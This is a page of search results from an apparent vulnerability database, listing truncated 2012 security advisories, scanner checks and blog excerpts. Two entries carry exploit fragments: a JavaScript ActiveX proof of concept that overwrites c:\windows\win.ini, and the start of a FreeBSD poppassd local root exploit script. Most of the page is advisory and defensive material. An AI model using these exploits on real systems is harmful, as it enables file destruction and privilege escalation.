7422 matches found
A CISO's Guide To Application Security – Part 4: Weighing AppSec Technology Options
This post is the fourth in a 5-part series on Application Security, or “AppSec”. The series will define the components of a sound AppSec program, delineate the growing threats to software, weigh the costs of a data breach, and outline the CISO’s responsibility in managing software security risk...
Baby Gekko CMS v1.1.5c Multiple Stored XSS Vulnerabilities
Exploit for php platform in category web applications Baby Gekko CMS v1.1.5c Multiple Stored Cross-Site Scripting Vulnerabilities Vendor: Baby Gekko, Inc. Product web page: http://www.babygekko.com Affected version: 1.1.5c Summary: BabyGekko strives to deliver high quality websites and other web...
The hackerproof password? Tips and advice on password management
Having some security expert tell you that you should be creating strong passwords that are unique per account and change frequently is like your dentist telling you that you should floss morning, night and after consuming any dentally dangerous foods. The majority of us say, "yeah right". The tru...
[SECURITY] [DSA 2461-1] spip security update
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------- Debian Security Advisory DSA-2461-1 [email protected] http://www.debian.org/security/ Moritz Muehlenhoff April 26, 2012 http://www.debian.org/security/faq -...
Developing and Sharing Tools for Professional Hackers
Professional hackers or security testers tend to write a lot of code. We write exploit code, fuzzers, code to handle esoteric protocols and data structures, unpackers, disassemblers, reversers, parsers, and so much more. We write this code because often what we’re doing is so specific that is...
Debian: Security Advisory (DSA-2453-1)
The remote host is missing an update for the Debian SPDX-FileCopyrightText: 2012 Greenbone AG Some text descriptions might be excerpted from referenced sources, and are Copyright (C) by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...
Debian: Security Advisory (DSA-2461-1)
The remote host is missing an update for the Debian SPDX-FileCopyrightText: 2012 Greenbone AG Some text descriptions might be excerpted from referenced sources, and are Copyright (C) by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...
IBM Rational AppScan Enterprise Platform Validation Code Execution Vulnerability
Bugtraq ID: 53247 CVE ID: CVE-2012-0736 IBM Rational AppScan is a web application security testing tool that performs automated dynamic and static vulnerability scanning during the development lifecycle. IBM Rational AppScan Enterprise Edition contains an error when creating scan jobs under certain configurations that allows a remote attacker to execute arbitrary code. By enticing a user to scan a malicious web site, arbitrary code can be executed on the target user's system. 0 IBM Rational Policy Tester 8.5 IBM Rational AppScan Reporting Console 8.0.1.1 IBM Rational AppScan Reportin...
Quest InTrust Annotation Objects ActiveX Control Add Method Vulnerability
Added: 04/27/2012 BID: 52765 OSVDB: 80662 Background InTrust collects, stores, reports and alerts on event log data from Windows, Unix and Linux systems. Problem Quest Intrust Annotation Objects ActiveX Control AnnotateX.dll is vulnerable to remote code execution due to an input validation error...
DSA-2459-1 quagga - several
Bulletin has no description...
EU Plan to Standardize Punishments Also Could Impact Security Research
While much has been made of recent efforts to provide parity in prosecutions and punishments for cybercrimes across the 27-nation European Union, less has been said about how it may impact security researchers who use the same hacker tools to perform their work. Under a proposal approved recently...
Quest vWorkspace 7.5 Connection Broker Client - ActiveX Control 'pnllmcli.dll 7.5.304.547' SaveMiniLaunchFile() Method Remote File Creation / Overwrite
var obj = new ActiveXObject("PNLLM.Client.1"); obj.SaveMiniLaunchFile("","c:\windows\win.ini");...
Fedora Update for rubygem-actionpack FEDORA-2012-3355
Check for the Version of rubygem-actionpack OpenVAS Vulnerability Test Fedora Update for rubygem-actionpack FEDORA-2012-3355 Authors: System Generated Check Copyright: Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net This program is free software; you can redistribute it and/or...
FreeBSD Qpopper poppassd latest version local r00t exploit
No description provided by source. !/bin/sh FreeBSD Qpopper poppassd latest version local r00t exploit by kcope tested on FreeBSD 5.4-RELEASE POPPASSDPATH=/usr/local/bin/poppassd HOOKLIB=libutil.so.4 echo "" echo "FreeBSD Qpopper poppassd latest version local r00t exploit by kcope" echo "" sleep ...
Fedora Update for rubygem-activemodel FEDORA-2011-11386
Check for the Version of rubygem-activemodel OpenVAS Vulnerability Test Fedora Update for rubygem-activemodel FEDORA-2011-11386 Authors: System Generated Check Copyright: Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net This program is free software; you can redistribute it and/...
Fedora Update for rubygem-actionpack FEDORA-2012-3321
Check for the Version of rubygem-actionpack OpenVAS Vulnerability Test Fedora Update for rubygem-actionpack FEDORA-2012-3321 Authors: System Generated Check Copyright: Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net This program is free software; you can redistribute it and/or...
Mutillidae 2.1.17 : Born to be Hacked
A few days ago an update, "Mutillidae" version 2.1.17, was released. Mutillidae is a free, open source web application provided to allow security enthusiasts to pen-test and hack a web application. Mutillidae can be installed on Linux, Windows XP, and Windows 7...
[SECURITY] Fedora 15 Update: rubygem-actionpack-3.0.5-6.fc15
Eases web-request routing, handling, and response as a half-way front, half-way page controller. Implemented with specific emphasis on enabling easy unit/integration testing that doesn't require a browser...
[SECURITY] Fedora 16 Update: rubygem-actionpack-3.0.10-3.fc16
Eases web-request routing, handling, and response as a half-way front, half-way page controller. Implemented with specific emphasis on enabling easy unit/integration testing that doesn't require a browser...
[SECURITY] Fedora 17 Update: rubygem-actionpack-3.0.11-2.fc17
Eases web-request routing, handling, and response as a half-way front, half-way page controller. Implemented with specific emphasis on enabling easy unit/integration testing that doesn't require a browser...